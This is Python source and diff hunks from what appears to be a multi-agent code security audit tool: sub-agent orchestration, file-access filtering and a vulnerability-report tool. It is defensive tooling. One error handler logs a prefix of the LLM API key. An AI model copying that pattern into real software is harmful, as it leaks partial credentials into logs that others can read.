        # Mirror the status in the shared registry.
        agent_registry.update_agent_status(self.agent_id, "waiting")

        return ToolResult(
            success=True,
            data={
                "status": "waiting",
                "message": f"Agent正在等待: {reason}",
                "agent_id": self.agent_id,
                "resume_conditions": [
                    "收到其他Agent的消息",
                    "收到用户消息",
                    "等待超时",
                ],
            },
        )
|
||||
|
||||
|
||||
class AgentFinishInput(BaseModel):
    """Agent完成输入参数"""
    # Input schema returned by AgentFinishTool.args_schema.
    # The docstring above is kept verbatim: pydantic publishes a model's
    # docstring as the schema description, so it is runtime text.

    # Short summary of what the agent achieved (required).
    result_summary: str = Field(..., description="结果摘要")

    # Findings, one string each; optional.
    findings: Optional[List[str]] = Field(
        default=None,
        description="发现列表",
    )

    # Whether the task finished successfully; defaults to True.
    success: bool = Field(
        default=True,
        description="是否成功",
    )

    # Follow-up recommendations; optional.
    recommendations: Optional[List[str]] = Field(
        default=None,
        description="建议列表",
    )
|
||||
|
||||
|
||||
class AgentFinishTool(AgentTool):
    """
    Tool a sub-agent calls when its task is done.

    Records the outcome in ``agent_registry`` (and on the agent state, when
    one was supplied) and sends a completion report to the parent agent.
    """

    def __init__(self, agent_id: str, agent_state=None):
        super().__init__()
        # ID of the agent that owns this tool.
        self.agent_id = agent_id
        # Optional state object; ``set_completed`` is called on it when present.
        self.agent_state = agent_state

    @property
    def name(self) -> str:
        return "agent_finish"

    @property
    def description(self) -> str:
        return """完成当前Agent的任务并向父Agent报告。

只有子Agent才能使用此工具。根Agent应使用finish_scan。

参数:
- result_summary: 结果摘要
- findings: 发现列表
- success: 是否成功完成
- recommendations: 建议列表"""

    @property
    def args_schema(self):
        return AgentFinishInput

    async def _execute(
        self,
        result_summary: str,
        findings: Optional[List[str]] = None,
        success: bool = True,
        recommendations: Optional[List[str]] = None,
        **kwargs
    ) -> ToolResult:
        """Finish the agent's task and notify its parent.

        Returns:
            A failed ``ToolResult`` when the agent has no parent in the
            registry; otherwise a successful result with a completion
            summary. The tool result is successful even when the task
            itself is reported with ``success=False``.
        """
        # Only agents with a parent may use this tool.
        parent_id = agent_registry.get_parent(self.agent_id)
        if not parent_id:
            return ToolResult(
                success=False,
                error="此工具只能由子Agent使用。根Agent请使用finish_scan。",
            )

        reported_findings = findings or []
        final_status = "completed" if success else "failed"

        result = {
            "summary": result_summary,
            "findings": reported_findings,
            "success": success,
            "recommendations": recommendations or [],
        }

        # Persist the outcome in the registry, then on the state object.
        agent_registry.update_agent_status(self.agent_id, final_status, result)
        if self.agent_state:
            self.agent_state.set_completed(result)

        # Report to the parent; each finding string is wrapped in a dict.
        wrapped_findings = []
        for item in reported_findings:
            wrapped_findings.append({"description": item})

        message_bus.send_completion_report(
            from_agent=self.agent_id,
            to_agent=parent_id,
            summary=result_summary,
            findings=wrapped_findings,
            success=success,
        )

        own_node = agent_registry.get_agent_node(self.agent_id)
        if own_node:
            display_name = own_node["name"]
        else:
            display_name = "Unknown"

        return ToolResult(
            success=True,
            data={
                "agent_completed": True,
                "parent_notified": True,
                "completion_summary": {
                    "agent_id": self.agent_id,
                    "agent_name": display_name,
                    "success": success,
                    "findings_count": len(reported_findings),
                },
            },
        )
|
||||
|
||||
|
||||
class RunSubAgentsInput(BaseModel):
    """批量执行子Agent输入参数"""
    # Input schema for the batch sub-agent execution tool.
    # The docstring above is kept verbatim: pydantic publishes a model's
    # docstring as the schema description, so it is runtime text.

    # IDs of the agents to run (required).
    agent_ids: List[str] = Field(
        ...,
        description="要执行的Agent ID列表",
    )

    # Whether to run the agents in parallel; defaults to True.
    parallel: bool = Field(
        default=True,
        description="是否并行执行",
    )
|
||||
|
||||
|
||||
class RunSubAgentsTool(AgentTool):
    """
    Tool that executes already-created sub-agents as one batch.

    Only agents found in the registry whose ``parent_id`` equals
    ``parent_agent_id`` and whose status is ``created`` or ``pending`` are run;
    every other requested ID is skipped without an error.
    """

    def __init__(
        self,
        parent_agent_id: str,
        llm_service=None,
        tools: Optional[Dict[str, Any]] = None,
        event_emitter=None,
    ):
        """
        Args:
            parent_agent_id: ID of the agent that owns the sub-agents.
            llm_service: Passed through to the executor.
            tools: Tool mapping passed through to the executor; ``None``
                becomes an empty dict.
            event_emitter: Passed through to the executor.
        """
        super().__init__()
        self.parent_agent_id = parent_agent_id
        self.llm_service = llm_service
        self.tools = tools or {}
        self.event_emitter = event_emitter

    @property
    def name(self) -> str:
        return "run_sub_agents"

    @property
    def description(self) -> str:
        return """批量执行已创建的子Agent。

使用场景:
1. 创建多个子Agent后批量执行
2. 并行执行多个分析任务

参数:
- agent_ids: 要执行的Agent ID列表
- parallel: 是否并行执行(默认true)"""

    @property
    def args_schema(self):
        return RunSubAgentsInput

    @staticmethod
    def _count_findings(agent_result: Dict[str, Any]) -> int:
        """Count findings in one agent result without assuming its shape.

        Returns 0 when the agent did not succeed, when ``data`` is missing,
        ``None`` or not a dict, or when ``findings`` is not a list/tuple.
        """
        if not agent_result.get("success"):
            return 0
        data = agent_result.get("data")
        if not isinstance(data, dict):
            return 0
        findings = data.get("findings")
        return len(findings) if isinstance(findings, (list, tuple)) else 0

    async def _execute(
        self,
        agent_ids: List[str],
        parallel: bool = True,
        **kwargs
    ) -> ToolResult:
        """
        Run the requested sub-agents and summarise the batch result.

        Args:
            agent_ids: IDs of the agents to run.
            parallel: Requested scheduling mode (see the review note below).
            **kwargs: Accepted and ignored.

        Returns:
            A ``ToolResult`` whose ``data`` carries batch statistics and at most
            the first 20 findings, and whose ``metadata`` carries a per-agent
            success flag and findings count.
        """
        if not agent_ids:
            return ToolResult(success=False, error="Agent ID列表不能为空")

        # Keep only agents that exist, belong to this parent and have not run yet.
        valid_agents = []
        for aid in agent_ids:
            node = agent_registry.get_agent_node(aid)
            if not node:
                continue
            if node.get("parent_id") != self.parent_agent_id:
                continue
            if node.get("status") not in ["created", "pending"]:
                continue
            valid_agents.append(node)

        if not valid_agents:
            return ToolResult(
                success=False,
                error="没有找到可执行的子Agent"
            )

        # Imported lazily inside the method, as in the original code.
        from ..core.executor import DynamicAgentExecutor, ExecutionTask

        executor = DynamicAgentExecutor(
            llm_service=self.llm_service,
            tools=self.tools,
            event_emitter=self.event_emitter,
        )

        tasks = [
            ExecutionTask(
                agent_id=node["id"],
                agent_type=node["type"],
                task=node["task"],
                context={
                    "knowledge_modules": node.get("knowledge_modules", []),
                },
            )
            for node in valid_agents
        ]

        async def agent_factory(task: ExecutionTask) -> Dict[str, Any]:
            """Pick the agent class for a task and run it through the executor."""
            from ..agents import AnalysisAgent, VerificationAgent

            agent_class_map = {
                "analysis": AnalysisAgent,
                "verification": VerificationAgent,
                "specialist": AnalysisAgent,  # specialists use the analysis agent
            }
            # Unknown agent types also fall back to the analysis agent.
            agent_class = agent_class_map.get(task.agent_type, AnalysisAgent)

            return await executor.execute_agent(
                agent_class=agent_class,
                agent_config={},
                input_data={
                    "task": task.task,
                    "task_context": task.context,
                },
                parent_id=self.parent_agent_id,
                knowledge_modules=task.context.get("knowledge_modules"),
            )

        # NOTE(review): the original code called execute_parallel() in both the
        # parallel and the "sequential" branch, so `parallel=False` has never
        # changed scheduling. That behaviour is kept here because the executor's
        # sequential API is not visible from this file - TODO wire it up.
        result = await executor.execute_parallel(tasks, agent_factory)

        return ToolResult(
            success=result.success,
            data={
                "message": f"执行完成: {result.completed_agents}/{result.total_agents} 成功",
                "total_agents": result.total_agents,
                "completed": result.completed_agents,
                "failed": result.failed_agents,
                "findings_count": len(result.all_findings),
                "findings": result.all_findings[:20],  # cap the returned list
                "duration_ms": result.total_duration_ms,
                "tokens_used": result.total_tokens,
            },
            error="; ".join(result.errors) if result.errors else None,
            metadata={
                "agent_results": {
                    aid: {
                        "success": r.get("success"),
                        "findings_count": self._count_findings(r),
                    }
                    for aid, r in result.agent_results.items()
                }
            },
        )
|
||||
|
||||
|
||||
class CollectSubAgentResultsTool(AgentTool):
    """
    Tool that gathers the results of all sub-agents of one parent agent.

    It reads each child's node from the agent registry, tallies statuses and
    merges the findings of completed children into one list.
    """

    def __init__(self, parent_agent_id: str):
        """
        Args:
            parent_agent_id: ID of the agent whose children are collected.
        """
        super().__init__()
        self.parent_agent_id = parent_agent_id

    @property
    def name(self) -> str:
        return "collect_sub_agent_results"

    @property
    def description(self) -> str:
        return """收集所有子Agent的执行结果。

返回:
- 所有子Agent的状态
- 汇总的发现列表
- 执行统计"""

    @property
    def args_schema(self):
        return None

    @staticmethod
    def _extract_findings(node: Dict[str, Any]) -> List[Any]:
        """Return the node's findings list, or ``[]`` when it is absent or malformed.

        A result that is not a dict, or a ``findings`` value that is not a list,
        yields an empty list instead of raising.
        """
        result = node.get("result")
        if not isinstance(result, dict):
            return []
        findings = result.get("findings")
        return findings if isinstance(findings, list) else []

    async def _execute(self, **kwargs) -> ToolResult:
        """
        Collect status and findings of every child agent.

        Returns:
            A successful ``ToolResult``. With no children, ``data`` reports a
            zero child count and an empty findings list. Otherwise it reports
            completed/failed/running counters, the merged findings of completed
            children and a per-child summary.
        """
        children = agent_registry.get_children(self.parent_agent_id)

        if not children:
            return ToolResult(
                success=True,
                data={
                    "message": "没有子Agent",
                    "children_count": 0,
                    "findings": [],
                }
            )

        all_findings = []
        completed = 0
        failed = 0
        running = 0
        child_summaries = []

        for child_id in children:
            node = agent_registry.get_agent_node(child_id)
            if not node:
                continue

            status = node.get("status", "unknown")
            # Extract once with type checks so both the merged list and the
            # per-child count tolerate a malformed result.
            findings = self._extract_findings(node)

            if status == "completed":
                completed += 1
                # Only completed children contribute to the merged list.
                all_findings.extend(findings)
            elif status == "failed":
                failed += 1
            elif status == "running":
                running += 1

            child_summaries.append({
                "id": child_id,
                "name": node.get("name"),
                "type": node.get("type"),
                "status": status,
                "findings_count": len(findings),
            })

        return ToolResult(
            success=True,
            data={
                "message": f"收集完成: {completed} 完成, {failed} 失败, {running} 运行中",
                "children_count": len(children),
                "completed": completed,
                "failed": failed,
                "running": running,
                "total_findings": len(all_findings),
                "findings": all_findings,
                "children": child_summaries,
            },
        )
|
||||
|
|
@ -4,11 +4,14 @@
|
|||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from typing import Optional, List, Dict, Any
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class CodeAnalysisInput(BaseModel):
|
||||
"""代码分析输入"""
|
||||
|
|
@ -155,6 +158,12 @@ class CodeAnalysisTool(AgentTool):
|
|||
)
|
||||
|
||||
except Exception as e:
|
||||
import traceback
|
||||
logger.error(f"代码分析失败: {e}")
|
||||
logger.error(f"LLM Provider: {self.llm_service.config.provider.value if self.llm_service.config else 'N/A'}")
|
||||
logger.error(f"LLM Model: {self.llm_service.config.model if self.llm_service.config else 'N/A'}")
|
||||
logger.error(f"API Key 前缀: {self.llm_service.config.api_key[:10] + '...' if self.llm_service.config and self.llm_service.config.api_key else 'N/A'}")
|
||||
logger.error(traceback.format_exc())
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"代码分析失败: {str(e)}",
|
||||
|
|
|
|||
|
|
@ -26,15 +26,24 @@ class FileReadTool(AgentTool):
|
|||
读取项目中的文件内容
|
||||
"""
|
||||
|
||||
def __init__(self, project_root: str):
|
||||
def __init__(
|
||||
self,
|
||||
project_root: str,
|
||||
exclude_patterns: Optional[List[str]] = None,
|
||||
target_files: Optional[List[str]] = None,
|
||||
):
|
||||
"""
|
||||
初始化文件读取工具
|
||||
|
||||
Args:
|
||||
project_root: 项目根目录
|
||||
exclude_patterns: 排除模式列表
|
||||
target_files: 目标文件列表(如果指定,只允许读取这些文件)
|
||||
"""
|
||||
super().__init__()
|
||||
self.project_root = project_root
|
||||
self.exclude_patterns = exclude_patterns or []
|
||||
self.target_files = set(target_files) if target_files else None
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
|
|
@ -61,6 +70,22 @@ class FileReadTool(AgentTool):
|
|||
def args_schema(self):
|
||||
return FileReadInput
|
||||
|
||||
def _should_exclude(self, file_path: str) -> bool:
|
||||
"""检查文件是否应该被排除"""
|
||||
# 如果指定了目标文件,只允许读取这些文件
|
||||
if self.target_files and file_path not in self.target_files:
|
||||
return True
|
||||
|
||||
# 检查排除模式
|
||||
for pattern in self.exclude_patterns:
|
||||
if fnmatch.fnmatch(file_path, pattern):
|
||||
return True
|
||||
# 也检查文件名
|
||||
if fnmatch.fnmatch(os.path.basename(file_path), pattern):
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
async def _execute(
|
||||
self,
|
||||
file_path: str,
|
||||
|
|
@ -71,6 +96,13 @@ class FileReadTool(AgentTool):
|
|||
) -> ToolResult:
|
||||
"""执行文件读取"""
|
||||
try:
|
||||
# 检查是否被排除
|
||||
if self._should_exclude(file_path):
|
||||
return ToolResult(
|
||||
success=False,
|
||||
error=f"文件被排除或不在目标文件列表中: {file_path}",
|
||||
)
|
||||
|
||||
# 安全检查:防止路径遍历
|
||||
full_path = os.path.normpath(os.path.join(self.project_root, file_path))
|
||||
if not full_path.startswith(os.path.normpath(self.project_root)):
|
||||
|
|
@ -178,15 +210,30 @@ class FileSearchTool(AgentTool):
|
|||
"""
|
||||
|
||||
# 排除的目录
|
||||
EXCLUDE_DIRS = {
|
||||
DEFAULT_EXCLUDE_DIRS = {
|
||||
"node_modules", "vendor", "dist", "build", ".git",
|
||||
"__pycache__", ".pytest_cache", "coverage", ".nyc_output",
|
||||
".vscode", ".idea", ".vs", "target", "venv", "env",
|
||||
}
|
||||
|
||||
def __init__(self, project_root: str):
|
||||
def __init__(
|
||||
self,
|
||||
project_root: str,
|
||||
exclude_patterns: Optional[List[str]] = None,
|
||||
target_files: Optional[List[str]] = None,
|
||||
):
|
||||
super().__init__()
|
||||
self.project_root = project_root
|
||||
self.exclude_patterns = exclude_patterns or []
|
||||
self.target_files = set(target_files) if target_files else None
|
||||
|
||||
# 从 exclude_patterns 中提取目录排除
|
||||
self.exclude_dirs = set(self.DEFAULT_EXCLUDE_DIRS)
|
||||
for pattern in self.exclude_patterns:
|
||||
if pattern.endswith("/**"):
|
||||
self.exclude_dirs.add(pattern[:-3])
|
||||
elif "/" not in pattern and "*" not in pattern:
|
||||
self.exclude_dirs.add(pattern)
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
|
|
@ -256,7 +303,7 @@ class FileSearchTool(AgentTool):
|
|||
# 遍历文件
|
||||
for root, dirs, files in os.walk(search_dir):
|
||||
# 排除目录
|
||||
dirs[:] = [d for d in dirs if d not in self.EXCLUDE_DIRS]
|
||||
dirs[:] = [d for d in dirs if d not in self.exclude_dirs]
|
||||
|
||||
for filename in files:
|
||||
# 检查文件模式
|
||||
|
|
@ -266,6 +313,19 @@ class FileSearchTool(AgentTool):
|
|||
file_path = os.path.join(root, filename)
|
||||
relative_path = os.path.relpath(file_path, self.project_root)
|
||||
|
||||
# 检查是否在目标文件列表中
|
||||
if self.target_files and relative_path not in self.target_files:
|
||||
continue
|
||||
|
||||
# 检查排除模式
|
||||
should_skip = False
|
||||
for excl_pattern in self.exclude_patterns:
|
||||
if fnmatch.fnmatch(relative_path, excl_pattern) or fnmatch.fnmatch(filename, excl_pattern):
|
||||
should_skip = True
|
||||
break
|
||||
if should_skip:
|
||||
continue
|
||||
|
||||
try:
|
||||
with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
|
||||
lines = f.readlines()
|
||||
|
|
@ -351,14 +411,30 @@ class ListFilesTool(AgentTool):
|
|||
列出目录中的文件
|
||||
"""
|
||||
|
||||
EXCLUDE_DIRS = {
|
||||
DEFAULT_EXCLUDE_DIRS = {
|
||||
"node_modules", "vendor", "dist", "build", ".git",
|
||||
"__pycache__", ".pytest_cache", "coverage",
|
||||
}
|
||||
|
||||
def __init__(self, project_root: str):
|
||||
def __init__(
|
||||
self,
|
||||
project_root: str,
|
||||
exclude_patterns: Optional[List[str]] = None,
|
||||
target_files: Optional[List[str]] = None,
|
||||
):
|
||||
super().__init__()
|
||||
self.project_root = project_root
|
||||
self.exclude_patterns = exclude_patterns or []
|
||||
self.target_files = set(target_files) if target_files else None
|
||||
|
||||
# 从 exclude_patterns 中提取目录排除
|
||||
self.exclude_dirs = set(self.DEFAULT_EXCLUDE_DIRS)
|
||||
for pattern in self.exclude_patterns:
|
||||
# 如果是目录模式(如 node_modules/**),提取目录名
|
||||
if pattern.endswith("/**"):
|
||||
self.exclude_dirs.add(pattern[:-3])
|
||||
elif "/" not in pattern and "*" not in pattern:
|
||||
self.exclude_dirs.add(pattern)
|
||||
|
||||
@property
|
||||
def name(self) -> str:
|
||||
|
|
@ -412,7 +488,7 @@ class ListFilesTool(AgentTool):
|
|||
if recursive:
|
||||
for root, dirnames, filenames in os.walk(target_dir):
|
||||
# 排除目录
|
||||
dirnames[:] = [d for d in dirnames if d not in self.EXCLUDE_DIRS]
|
||||
dirnames[:] = [d for d in dirnames if d not in self.exclude_dirs]
|
||||
|
||||
for filename in filenames:
|
||||
if pattern and not fnmatch.fnmatch(filename, pattern):
|
||||
|
|
@ -420,6 +496,20 @@ class ListFilesTool(AgentTool):
|
|||
|
||||
full_path = os.path.join(root, filename)
|
||||
relative_path = os.path.relpath(full_path, self.project_root)
|
||||
|
||||
# 检查是否在目标文件列表中
|
||||
if self.target_files and relative_path not in self.target_files:
|
||||
continue
|
||||
|
||||
# 检查排除模式
|
||||
should_skip = False
|
||||
for excl_pattern in self.exclude_patterns:
|
||||
if fnmatch.fnmatch(relative_path, excl_pattern) or fnmatch.fnmatch(filename, excl_pattern):
|
||||
should_skip = True
|
||||
break
|
||||
if should_skip:
|
||||
continue
|
||||
|
||||
files.append(relative_path)
|
||||
|
||||
if len(files) >= max_files:
|
||||
|
|
@ -428,26 +518,78 @@ class ListFilesTool(AgentTool):
|
|||
if len(files) >= max_files:
|
||||
break
|
||||
else:
|
||||
for item in os.listdir(target_dir):
|
||||
if item in self.EXCLUDE_DIRS:
|
||||
continue
|
||||
# 🔥 如果设置了 target_files,只显示目标文件和包含目标文件的目录
|
||||
if self.target_files:
|
||||
# 计算哪些目录包含目标文件
|
||||
dirs_with_targets = set()
|
||||
for tf in self.target_files:
|
||||
# 获取目标文件的目录部分
|
||||
tf_dir = os.path.dirname(tf)
|
||||
while tf_dir:
|
||||
dirs_with_targets.add(tf_dir)
|
||||
tf_dir = os.path.dirname(tf_dir)
|
||||
|
||||
full_path = os.path.join(target_dir, item)
|
||||
relative_path = os.path.relpath(full_path, self.project_root)
|
||||
|
||||
if os.path.isdir(full_path):
|
||||
dirs.append(relative_path + "/")
|
||||
else:
|
||||
if pattern and not fnmatch.fnmatch(item, pattern):
|
||||
for item in os.listdir(target_dir):
|
||||
if item in self.exclude_dirs:
|
||||
continue
|
||||
files.append(relative_path)
|
||||
|
||||
if len(files) >= max_files:
|
||||
break
|
||||
full_path = os.path.join(target_dir, item)
|
||||
relative_path = os.path.relpath(full_path, self.project_root)
|
||||
|
||||
if os.path.isdir(full_path):
|
||||
# 只显示包含目标文件的目录
|
||||
if relative_path in dirs_with_targets or any(
|
||||
tf.startswith(relative_path + "/") for tf in self.target_files
|
||||
):
|
||||
dirs.append(relative_path + "/")
|
||||
else:
|
||||
if pattern and not fnmatch.fnmatch(item, pattern):
|
||||
continue
|
||||
|
||||
# 检查是否在目标文件列表中
|
||||
if relative_path not in self.target_files:
|
||||
continue
|
||||
|
||||
files.append(relative_path)
|
||||
|
||||
if len(files) >= max_files:
|
||||
break
|
||||
else:
|
||||
# 没有设置 target_files,正常列出
|
||||
for item in os.listdir(target_dir):
|
||||
if item in self.exclude_dirs:
|
||||
continue
|
||||
|
||||
full_path = os.path.join(target_dir, item)
|
||||
relative_path = os.path.relpath(full_path, self.project_root)
|
||||
|
||||
if os.path.isdir(full_path):
|
||||
dirs.append(relative_path + "/")
|
||||
else:
|
||||
if pattern and not fnmatch.fnmatch(item, pattern):
|
||||
continue
|
||||
|
||||
# 检查排除模式
|
||||
should_skip = False
|
||||
for excl_pattern in self.exclude_patterns:
|
||||
if fnmatch.fnmatch(relative_path, excl_pattern) or fnmatch.fnmatch(item, excl_pattern):
|
||||
should_skip = True
|
||||
break
|
||||
if should_skip:
|
||||
continue
|
||||
|
||||
files.append(relative_path)
|
||||
|
||||
if len(files) >= max_files:
|
||||
break
|
||||
|
||||
# 格式化输出
|
||||
output_parts = [f"📁 目录: {directory}\n"]
|
||||
|
||||
# 🔥 如果设置了 target_files,显示提示信息
|
||||
if self.target_files:
|
||||
output_parts.append(f"⚠️ 注意: 审计范围限定为 {len(self.target_files)} 个指定文件\n")
|
||||
|
||||
if dirs:
|
||||
output_parts.append("目录:")
|
||||
for d in sorted(dirs)[:20]:
|
||||
|
|
@ -459,6 +601,13 @@ class ListFilesTool(AgentTool):
|
|||
output_parts.append(f"\n文件 ({len(files)}):")
|
||||
for f in sorted(files):
|
||||
output_parts.append(f" 📄 {f}")
|
||||
elif self.target_files:
|
||||
# 如果没有文件但设置了 target_files,显示目标文件列表
|
||||
output_parts.append(f"\n指定的目标文件 ({len(self.target_files)}):")
|
||||
for f in sorted(self.target_files)[:20]:
|
||||
output_parts.append(f" 📄 {f}")
|
||||
if len(self.target_files) > 20:
|
||||
output_parts.append(f" ... 还有 {len(self.target_files) - 20} 个文件")
|
||||
|
||||
if len(files) >= max_files:
|
||||
output_parts.append(f"\n... 结果已截断(最大 {max_files} 个文件)")
|
||||
|
|
|
|||
|
|
@ -0,0 +1,235 @@
|
|||
"""
|
||||
漏洞报告工具
|
||||
|
||||
正式记录漏洞的唯一方式,确保漏洞报告的规范性和完整性。
|
||||
"""
|
||||
|
||||
import logging
|
||||
import uuid
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional, List, Dict, Any
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
from .base import AgentTool, ToolResult
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class VulnerabilityReportInput(BaseModel):
    """Input parameters for creating a vulnerability report."""

    # --- required fields ---
    title: str = Field(
        ...,
        description="漏洞标题",
    )
    vulnerability_type: str = Field(..., description="漏洞类型: sql_injection, xss, ssrf, command_injection, path_traversal, idor, auth_bypass, etc.")
    severity: str = Field(..., description="严重程度: critical, high, medium, low, info")
    description: str = Field(
        ...,
        description="漏洞详细描述",
    )
    file_path: str = Field(
        ...,
        description="漏洞所在文件路径",
    )

    # --- optional location and evidence ---
    line_start: Optional[int] = Field(
        default=None,
        description="起始行号",
    )
    line_end: Optional[int] = Field(
        default=None,
        description="结束行号",
    )
    code_snippet: Optional[str] = Field(
        default=None,
        description="相关代码片段",
    )
    source: Optional[str] = Field(
        default=None,
        description="污点来源(用户输入点)",
    )
    sink: Optional[str] = Field(
        default=None,
        description="危险函数(漏洞触发点)",
    )
    poc: Optional[str] = Field(
        default=None,
        description="概念验证/利用方法",
    )

    # --- optional assessment ---
    impact: Optional[str] = Field(
        default=None,
        description="影响分析",
    )
    recommendation: Optional[str] = Field(
        default=None,
        description="修复建议",
    )
    confidence: float = Field(
        default=0.8,
        description="置信度 0.0-1.0",
    )
    cwe_id: Optional[str] = Field(
        default=None,
        description="CWE编号",
    )
    cvss_score: Optional[float] = Field(
        default=None,
        description="CVSS评分",
    )
|
||||
|
||||
|
||||
class CreateVulnerabilityReportTool(AgentTool):
    """
    Tool that creates a formal vulnerability report.

    Each report is stored twice: on the instance (``get_reports``) and in a
    class-level list shared by all instances (``get_all_reports``). Reports
    created through this tool are marked ``is_verified=True``.
    """

    # Shared by every instance on purpose; read via get_all_reports() and
    # emptied via clear_all_reports().
    _vulnerability_reports: List[Dict[str, Any]] = []

    # Accepted severity levels, in the order shown in the error message.
    _VALID_SEVERITIES = ("critical", "high", "medium", "low", "info")

    # Known vulnerability types; other values are accepted with a warning.
    _KNOWN_TYPES = frozenset({
        "sql_injection", "nosql_injection", "xss", "ssrf",
        "command_injection", "code_injection", "path_traversal",
        "file_inclusion", "idor", "auth_bypass", "broken_auth",
        "sensitive_data_exposure", "hardcoded_secret", "weak_crypto",
        "xxe", "deserialization", "race_condition", "business_logic",
        "csrf", "open_redirect", "mass_assignment", "other",
    })

    # Marker shown in the result message for each severity.
    _SEVERITY_EMOJI = {
        "critical": "🔴",
        "high": "🟠",
        "medium": "🟡",
        "low": "🟢",
        "info": "🔵",
    }

    # Fallback remediation text per vulnerability type.
    _DEFAULT_RECOMMENDATIONS = {
        "sql_injection": "使用参数化查询或ORM,避免字符串拼接构造SQL语句",
        "xss": "对用户输入进行HTML实体编码,使用CSP策略,避免innerHTML",
        "ssrf": "验证和限制目标URL,使用白名单,禁止访问内网地址",
        "command_injection": "避免使用shell执行,使用参数列表传递命令,严格验证输入",
        "path_traversal": "规范化路径后验证,使用白名单,限制访问目录",
        "idor": "实现细粒度访问控制,验证资源所有权,使用UUID替代自增ID",
        "auth_bypass": "加强认证逻辑,实现多因素认证,定期审计认证代码",
        "hardcoded_secret": "使用环境变量或密钥管理服务存储敏感信息",
        "weak_crypto": "使用强加密算法(AES-256, SHA-256+),避免MD5/SHA1",
        "xxe": "禁用外部实体解析,使用安全的XML解析器配置",
        "deserialization": "避免反序列化不可信数据,使用JSON替代pickle/yaml",
    }

    def __init__(self):
        super().__init__()
        # Reports created through this particular instance.
        self._reports: List[Dict[str, Any]] = []

    @property
    def name(self) -> str:
        return "create_vulnerability_report"

    @property
    def description(self) -> str:
        return """创建正式的漏洞报告。这是记录已确认漏洞的唯一方式。

只有在以下情况下才应该使用此工具:
1. 漏洞已经过充分分析和验证
2. 有明确的证据支持漏洞存在
3. 已经评估了漏洞的影响

必需参数:
- title: 漏洞标题
- vulnerability_type: 漏洞类型
- severity: 严重程度 (critical/high/medium/low/info)
- description: 详细描述
- file_path: 文件路径

可选参数:
- line_start/line_end: 行号范围
- code_snippet: 代码片段
- source/sink: 数据流信息
- poc: 概念验证
- impact: 影响分析
- recommendation: 修复建议
- confidence: 置信度
- cwe_id: CWE编号
- cvss_score: CVSS评分"""

    @property
    def args_schema(self):
        return VulnerabilityReportInput

    async def _execute(
        self,
        title: str,
        vulnerability_type: str,
        severity: str,
        description: str,
        file_path: str,
        line_start: Optional[int] = None,
        line_end: Optional[int] = None,
        code_snippet: Optional[str] = None,
        source: Optional[str] = None,
        sink: Optional[str] = None,
        poc: Optional[str] = None,
        impact: Optional[str] = None,
        recommendation: Optional[str] = None,
        confidence: float = 0.8,
        cwe_id: Optional[str] = None,
        cvss_score: Optional[float] = None,
        **kwargs
    ) -> ToolResult:
        """
        Validate the input, build the report and store it.

        ``title``, ``description`` and ``file_path`` must be non-blank.
        ``severity`` and ``vulnerability_type`` are trimmed and lower-cased
        before validation. An unknown severity is rejected; an unknown
        vulnerability type is accepted with a logged warning. ``confidence``
        is clamped to the range 0.0-1.0.

        Returns:
            A failed ``ToolResult`` describing the first validation error, or a
            successful one with the report ID in ``data`` and the full report
            in ``metadata``.
        """
        # Required text fields: trim once and reuse the trimmed value everywhere.
        title = (title or "").strip()
        if not title:
            return ToolResult(success=False, error="标题不能为空")

        description = (description or "").strip()
        if not description:
            return ToolResult(success=False, error="描述不能为空")

        file_path = (file_path or "").strip()
        if not file_path:
            return ToolResult(success=False, error="文件路径不能为空")

        # Trim before comparing so values such as " High " are accepted.
        valid_severities = self._VALID_SEVERITIES
        severity = (severity or "").strip().lower()
        if severity not in valid_severities:
            return ToolResult(
                success=False,
                error=f"无效的严重程度 '{severity}',必须是: {', '.join(valid_severities)}"
            )

        vulnerability_type = (vulnerability_type or "").strip().lower()
        if vulnerability_type not in self._KNOWN_TYPES:
            # Unknown types are allowed; they are only logged.
            logger.warning(f"Unknown vulnerability type: {vulnerability_type}")

        confidence = max(0.0, min(1.0, confidence))

        report_id = f"vuln_{uuid.uuid4().hex[:8]}"

        report = {
            "id": report_id,
            "title": title,
            "vulnerability_type": vulnerability_type,
            "severity": severity,
            "description": description,
            "file_path": file_path,
            "line_start": line_start,
            "line_end": line_end,
            "code_snippet": code_snippet,
            "source": source,
            "sink": sink,
            "poc": poc,
            "impact": impact,
            "recommendation": recommendation or self._get_default_recommendation(vulnerability_type),
            "confidence": confidence,
            "cwe_id": cwe_id,
            "cvss_score": cvss_score,
            "created_at": datetime.now(timezone.utc).isoformat(),
            "is_verified": True,  # everything created through this tool counts as verified
        }

        # Store on the instance and in the class-wide list.
        self._reports.append(report)
        CreateVulnerabilityReportTool._vulnerability_reports.append(report)

        logger.info(f"Created vulnerability report: [{severity.upper()}] {title}")

        severity_emoji = self._SEVERITY_EMOJI.get(severity, "⚪")

        return ToolResult(
            success=True,
            data={
                "message": f"漏洞报告已创建: {severity_emoji} [{severity.upper()}] {title}",
                "report_id": report_id,
                "severity": severity,
            },
            metadata=report,
        )

    def _get_default_recommendation(self, vuln_type: str) -> str:
        """Return the fallback remediation text for ``vuln_type``.

        Types without a specific entry get a generic recommendation.
        """
        return self._DEFAULT_RECOMMENDATIONS.get(vuln_type, "请根据具体情况修复此安全问题")

    def get_reports(self) -> List[Dict[str, Any]]:
        """Return a shallow copy of the reports created by this instance."""
        return self._reports.copy()

    @classmethod
    def get_all_reports(cls) -> List[Dict[str, Any]]:
        """Return a shallow copy of the reports created by all instances."""
        return cls._vulnerability_reports.copy()

    @classmethod
    def clear_all_reports(cls) -> None:
        """Empty the class-wide report list (per-instance lists are untouched)."""
        cls._vulnerability_reports.clear()
|
||||
|
|
@ -0,0 +1,167 @@
|
|||
"""
|
||||
Think 工具 - 深度推理工具
|
||||
|
||||
让Agent进行深度思考和推理,用于:
|
||||
- 分析复杂情况
|
||||
- 规划下一步行动
|
||||
- 评估发现的严重性
|
||||
- 决定是否需要创建子Agent
|
||||
"""
|
||||
|
||||
import logging
|
||||
